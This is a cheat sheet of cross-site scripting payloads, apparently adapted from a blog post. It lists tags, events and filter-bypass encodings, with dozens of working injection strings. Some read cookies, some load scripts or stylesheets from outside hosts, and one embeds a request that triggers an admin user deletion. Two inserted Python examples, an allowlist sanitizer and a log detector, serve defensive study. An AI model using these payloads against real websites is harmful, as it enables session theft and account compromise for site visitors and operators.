XSS Payload List

Tags, events, attributes

The following tags, events and attributes can all be used to trigger XSS.

Tags

<script>  <a>  <p>  <img> 

<body>  <button>  <var>  <div> <style>

<iframe>  <object>  <input>  <select> 

<textarea>  <keygen>  <frameset>  <embed> 

<svg>  <math>  <video>  <audio> 

<link>  <table>

Events

Event handler attributes all begin with on (onXxx):

onload  onerror  onunload  onchange  onsubmit

onreset  onselect  onblur  onfocus

onabort  onkeydown  onkeypress  onkeyup 

onclick  ondblclick  onmouseover  onmousemove 

onmouseout  onmouseup  onforminput  onformchange 

ondrag  ondrop 

Attributes

formaction  action  href 

xlink:href  autofocus  src

content  data  expression
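The defensive counterpart of the list above is an allowlist rather than a blocklist: keep a handful of known-safe tags and attributes, drop every on* handler and every URL attribute whose scheme is not http(s)/mailto after decoding, and re-serialise the result. The sanitizer below is an added example, not code from the original post; it uses only the Python standard library, and the allowlist (ALLOWED_TAGS, ALLOWED_ATTRS, SAFE_SCHEMES) is an assumed minimal set for comment-style content. The inputs in main() are payloads from this page plus one constructed benign fragment.

```python
"""Allowlist HTML sanitizer: keeps a few known-safe tags/attributes, drops all else.

Added example (standard library only); not code from the original post.
The allowlist below is an assumed minimal set for comment-style content.
"""
import html
import re
from html.parser import HTMLParser

ALLOWED_TAGS = {"a", "b", "i", "p", "br", "img", "ul", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}                  # values that are URLs and need a scheme check
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br", "img"}
DROP_CONTENT = {"script", "style"}           # their text is code, not content: discard it


def is_safe_url(value):
    """True for relative URLs and http/https/mailto; False for javascript:, vbscript:, data: etc.

    HTMLParser already decodes entities in attribute values, so "java&#97;script:" and
    "javascript&colon;" arrive here as "javascript:". A second unescape plus removal of
    control/whitespace characters also covers double-encoded or tab/newline-padded values.
    """
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", html.unescape(value)).lower()
    m = re.match(r"([a-z][a-z0-9+.-]*):", cleaned)
    return m is None or m.group(1) in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []      # sanitised output pieces
        self.open = []     # allowed tags currently open, so the output stays balanced
        self.skip = 0      # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
            return
        if tag not in ALLOWED_TAGS:
            return         # unknown tag vanishes; its text content is still emitted as text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue   # drops every on* handler, style, formaction, autofocus, ...
            value = value or ""
            if name in URL_ATTRS and not is_safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_startendtag(self, tag, attrs):    # <br/> style
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
            return
        if tag in self.open:
            while self.open:                    # also closes anything left open inside it
                t = self.open.pop()
                self.out.append("</%s>" % t)
                if t == tag:
                    break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))

    # handle_comment / handle_decl / handle_pi / unknown_decl are inherited no-ops,
    # so comments, <!DOCTYPE>, <?xml ?> and CDATA sections are dropped.

    def close(self):
        super().close()
        while self.open:                        # close tags the input left open
            self.out.append("</%s>" % self.open.pop())


def sanitize(fragment):
    p = Sanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)


if __name__ == "__main__":
    # Payloads from this page plus one constructed benign fragment.
    samples = [
        '<p>Hello <b>world</b> <a href="https://example.com">link</a></p>',
        "<img src=x onerror=alert(1)>",
        "<a href=java&#97;script:alert(document.cookie)>href</a>",
        "<form><button formaction=javascript&colon;alert(1)>M",
        "<b/ondrag=alert()>M",
        "<script>alert(document.cookie)</script>",
        '<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>',
    ]
    for s in samples:
        print("%-70r -> %r" % (s, sanitize(s)))
```

An allowlist fails safe: svg, math, iframe, embed, meta, object and every other tag in the list above never reach the output because they were never permitted, so nothing from this cheat sheet has to be enumerated by the defender. The `<b/ondrag=alert()>M` case shows why the parser, not a regex, must do the tokenising: the slash-for-space trick is resolved by the same tokenizer the browser uses, and the handler is dropped like any other attribute. For production code a maintained sanitizer library is the right choice, since it also covers CSS and nested-markup corner cases this stdlib parser does not.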


HTML Code Injection

script tag

<script>document.write(String.fromCharCode(your code here));</script>   // bypass when =, single quotes, double quotes and spaces are filtered

><script>alert(document.cookie)</script>

</script><script>alert(document.cookie)</script>

<script firefox>alert(1)</script>  // a well-formed script tag is not actually needed 

<script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script> 
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>  // those encodings can still be used here 
<script>prompt(-[])</script>  // not only alert: prompt and confirm also pop up a dialog 
<script>alert(/3/)</script>  // "/" can stand in for single and double quotes 
<script>alert(String.fromCharCode(49))</script>  // char codes work too 
<script>alert(/7/.source)</script>  // ".source" does not stop alert(7) from executing 
<script>setTimeout('alert(1)',0)</script>  // if the output lands inside setTimeout, alert(1) still executes directly


<SCRIPT SRC=//3w.org/XSS/xss.js>  // no closing script tag
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>;  // no closing script tag (Firefox and a few other browsers only)

a tag

<a href=java&#97;script:alert(document.cookie)>href</a>
<svg><a xlink:href="javascript:alert(1234)"><rect width="1000" height="1000" fill="white"/></a></svg> 

img tag + onerror (JS invoked via the event)

<img src=# onerror="alert(document.cookie)"/>
<img src=x onerror=alert(1)> 
<img src ?itworksonchrome?\/onerror = alert(1)>  // Chrome only 
<img src=x onerror=window.open('http://google.com');> 
<img/src/onerror=alert(1)>  // Chrome only 
<img src="x:kcf" onerror="alert(1)">

// IMG embedded command; arbitrary commands can be executed
<IMG SRC="http://www.XXX.com/a.php?a=b">

// IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

button tag

Some people probably still think that calling JS from a button tag has to go through an event handler, as in the following example:

<button/onclick=alert(1) >M</button>

So if every on* event is filtered, is there nothing left? In fact, HTML5 gives us a new place to put it:

<form><button formaction=javascript&colon;alert(1)>M

Some readers will object at this point that this requires user interaction. With the onfocus event combined with autofocus, the popup fires automatically, with no interaction at all.

<button onfocus=alert(1) autofocus>

p tag + onmouseover event (JS invoked via the event)

<p/onmouseover=javascript:alert(1); >M</p>
<p onmouseover=alert(/insight-labs/)>insight-labs
<frameset onload=alert(/insight-labs/)>
<body onload=alert(/insight-labs/)>

body tag + onload (JS invoked via the event)

<body onload=alert(/insight-labs/)>
<BODY BACKGROUND="javascript:alert(XSS)">
<body onload=alert(1)> 
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> 

var tag

<var onmouseover="prompt(1)">KCF</var>

input tag + attributes / events

<INPUT TYPE="IMAGE" SRC="javascript:alert(XSS);">
<input onfocus=javascript:alert(1) autofocus> 
<input onblur=javascript:alert(1) autofocus><input autofocus>

link tag

<LINK REL="stylesheet" HREF="javascript:alert(XSS);">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

object tag

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(XSS)></OBJECT>

meta tag (refresh)

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(XSS);">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(XSS);">

frameset tag

<frameset onload=alert(/insight-labs/)>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<FRAMESET><FRAME src=javascript:alert('XpSS')></FRAME></FRAMESET>

table tag

<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">


CSS code injection: style tag / div style attribute + expression()

<STYLE>
    .testcss{
        color: expression(alert(1))
    }
</STYLE>

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<style>body {background-image: url("javascript:alert(123)");}</style>
<STYLE>@import'javascript:alert("XSS")';</STYLE>
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE TYPE="text/javascript">alert(XSS);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(XSS)");}</STYLE><A class="XSS"></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(XSS)")}</STYLE>

<div style="background-image:url(javascript:alert(123))">
<DIV STYLE="background-image:\0075\0072\006C\0028\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029\0029">
<DIV STYLE="width: expression(alert(XSS));">

onclick attribute

<L onclick=alert(document.cookie)>click me</L>


iframe tag (DOM-type injection)

JS execution via onload

<iframe onload="alert(1)"></iframe>

JS execution via src=javascript:

<iframe src="javascript:alert(1)"></iframe>

vbscript: code execution (IE)

<iframe src="vbscript:msgbox(1)"></iframe>

data: protocol code execution (Chrome)

<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

?url=<iframe src=JavaScript:(prompt)(document.domain)>a://target-url<a>

<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

srcdoc attribute (Chrome)

<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>


JS code injection without < >

?query%5Border_No%5D=&query%5Bmobile%5D=%27%2balert`1`%2b%27

?query[order_No]=&query[mobile]='+alert`1`+'


Ways to bypass filters

  • Encoding conversion, numeric-base encoding, mixed encoding
&lt;script&nbsp;src=//xss.tw/3058&gt;&lt;/script&gt;
&quot;  quote
&nbsp;  space
&lt;    <
&gt;    >
  • Case variation
  • Nesting


Replacing spaces

<img/src=x onerror=alert(1)>

<M/onclick="alert(1)">M


The shortest XSS: 20 characters

<b/ondrag=alert()>M
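Every bypass in the three passages above (entity and mixed encoding, case variation, nesting; "/" in place of a space; the minimal `<b/ondrag=...>` payload) defeats a filter that matches the raw request text. The detector below is an added example, not code from the original post; it uses only the Python standard library. It normalises a log line first, percent-decoding until the string stops changing, then decoding HTML entities and lower-casing, and only afterwards applies its patterns. The lines in SAMPLE_LOG are constructed; the payloads embedded in them are the ones listed on this page, percent-encoded as a browser would send them, and PATTERNS is an assumed demo ruleset, not a complete one.

```python
"""Normalise-then-match XSS detector for request log lines.

Added example (standard library only); not from the original post. The rules in
PATTERNS are an assumed demo set, not a complete production ruleset.
"""
import html
import re
from urllib.parse import unquote

# An ordered list, so findings come out in a stable order.
PATTERNS = [
    ("script-tag", re.compile(r"<\s*script\b")),
    # on* must follow a separator; "/" counts, which is what <img/src/onerror=...> relies on
    ("event-handler", re.compile(r"""[\s/"']on[a-z]+\s*=""")),
    ("js-url", re.compile(r"\b(?:javascript|vbscript|data)\s*:")),
    ("css-expression", re.compile(r"expression\s*\(")),
    # alert`1` is a tagged-template call, so a backtick counts as well as "("
    ("js-call", re.compile(r"\b(?:alert|prompt|confirm)\s*[(`]")),
]


def normalize(text, max_rounds=3):
    """Canonical form: percent-decode to a fixed point (bounded), HTML-unescape, drop NULs, lowercase.

    Decoding until nothing changes defeats double and mixed encoding; unescaping after that
    turns &lt; &gt; &nbsp; &#97; &colon; back into the characters the browser will see.
    """
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return html.unescape(text).replace("\x00", "").lower()


def scan_line(line):
    """Names of the rules that match the normalised line (empty list if clean)."""
    norm = normalize(line)
    return [name for name, rx in PATTERNS if rx.search(norm)]


def scan_log(lines):
    """(index, rule names) for every flagged line."""
    findings = []
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            findings.append((i, hits))
    return findings


# Constructed access-log lines. The payloads are the ones from this page,
# percent-encoded the way a browser sends them in a query string.
SAMPLE_LOG = [
    "GET /search?q=shoes HTTP/1.1",                                                        # benign
    "GET /orders?query%5Border_No%5D=&query%5Bmobile%5D=%27%2balert`1`%2b%27 HTTP/1.1",   # no < > at all
    "GET /post?c=%26lt%3Bscript%26nbsp%3Bsrc%3D%2F%2Fxss.tw%2F3058%26gt%3B HTTP/1.1",     # entity-encoded, then URL-encoded
    "GET /p?x=%3Cimg%2Fsrc%2Fonerror%3Dalert(1)%3E HTTP/1.1",                              # "/" instead of spaces
    "GET /p?u=JavaScript%3A(prompt)(document.domain) HTTP/1.1",                            # mixed case, no "prompt("
    "GET /p?s=%3Cb%2Fondrag%3Dalert()%3EM HTTP/1.1",                                       # the shortest payload
    "GET /p?t=%2526lt%253Bscript%2526gt%253B HTTP/1.1",                                    # double percent-encoding
]

if __name__ == "__main__":
    for i, hits in scan_log(SAMPLE_LOG):
        print("line %d %-30s %s" % (i, hits, SAMPLE_LOG[i]))
```

Two things the run shows that the patterns alone would not: the `(prompt)(document.domain)` line is caught only by the js-url rule, because the call never has `prompt(` in it, so a single "dangerous function" signature is not enough and rules must overlap; and the double-encoded line is caught only because normalize() decodes to a fixed point, a single unquote() would leave `&lt;script&gt;` in the text. Matching on normalised text costs nothing at log volume and removes the entire class of encoding bypasses from the table.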


Tags you can try

// US-ASCII encoding (found by Kurt). Using 7-bit ASCII encoding in place of 8-bit bypasses many filters, but the server must be talking US-ASCII; so far only Apache Tomcat has been found to do so.
¼script¾alert(¢XSS¢)¼/script¾

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(XSS);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(XSS)>


Flash injection: embed tag

The embed tag can embed Flash, and the Flash can carry XSS:

<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="></embed>  // Chrome 
<embed src=javascript:alert(1)>  // Firefox

<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

.swf

Code:
a="get";
b="URL(\"";
c="javascript:";
d="alert(XSS);\")";
eval(a+b+c+d);

Reference

https://www.leavesongs.com/PENETRATION/xss-collect.html

Origin: www.cnblogs.com/mysticbinary/p/12158729.html